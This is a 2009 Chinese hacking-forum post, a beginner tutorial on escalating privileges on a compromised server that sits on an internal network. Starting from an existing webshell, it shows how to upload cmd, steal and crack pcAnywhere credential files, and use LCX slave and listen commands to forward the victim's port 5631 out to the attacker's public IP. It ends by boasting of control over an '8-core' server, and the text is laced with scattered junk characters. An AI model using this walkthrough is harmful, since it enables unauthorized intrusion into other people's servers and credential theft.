|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
! t" z; G* F* b- d% q( z5 f R: d3 \3 H. w( S# N* ]" V
提权方法:pcanywhere+LCX) T, s) {: s8 Y, ?* }, L, }( e: U9 E
$ @% a1 Q5 a6 o. \8 S1 @ B获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。( R& l4 F. t" i, X* P4 m$ y, K. y" ^4 Y
: I3 z3 D( z( \; [$ F8 N8 F
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
9 i+ c, }/ [% [# _5 N% x7 b- o1 ]
/ R+ v, |) H# B# `- G; [3 ~1 M3 \2 [( ~8 `+ O9 W$ y* Q
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。: b: f; E# P, U
- f" {8 y" i! u/ S/ h( N3 c7 y
5 t8 O# o, y7 g. s9 }* v& R呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。% s5 z8 D# [/ b! Y0 |! d5 C
" I$ O% v7 L% Q$ }* J+ s/ v9 o
% V9 R2 B' y2 }7 |2 E9 Z& P; {0 f9 b8 |9 t9 l1 y
5 i# M$ @( G% j+ _! {& G4 Z5 K
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``2 B! h1 }) ]% e r1 I- |+ D
1 v. q: F, P% M: P/ h# S, h5 |
7 |" Y+ T# T" N* @LCX的用法再简单说下:
! F7 N$ |' ~0 l# T, v2 }! O- Z$ M
, R2 ?( ^' U- [% s; e1 f: m3 v# w: u服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)8 }( j Y" z8 M8 {' G! [) I
+ \1 v3 Q. i) W# s0 O+ V, }4 R* m
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)' [! d; W! G$ N" J( u+ D+ |
9 U3 F X: i0 l0 d& @由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
( V! Z- t* c' s/ F' E$ i6 o顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``" I. ~# J6 E2 [, x
# } F. V+ f$ D& b! H: G$ P |
+ Z# W& `* e$ k2 }' m) j
+ `0 H! T! t4 h
8 v; `$ N$ o! q/ l/ U9 q' l! _呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
) |- Y9 w9 Z! Y, `. w+ J1 [4 I; z
, z' `7 r2 W d* q# P
2 H0 {% n$ t! K3 L2 k) ]6 @/ I0 f
6 n# W F& O6 m8 ?* O我们本地连接试试,输入我们刚破解的账号密码
4 f& L4 J- { q
5 Y2 j: d7 o3 ]+ `
( o9 O" y+ n! z6 [/ j O8 q, Y/ I呵呵``连接成功,服务器不错,又一个8核^︵^
6 k' \3 \2 C& R d. J" a# m& a7 D7 v$ o3 Y
9 k. I2 t ]* t* \3 V
8 Z3 c2 c6 [" S |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
.gif)
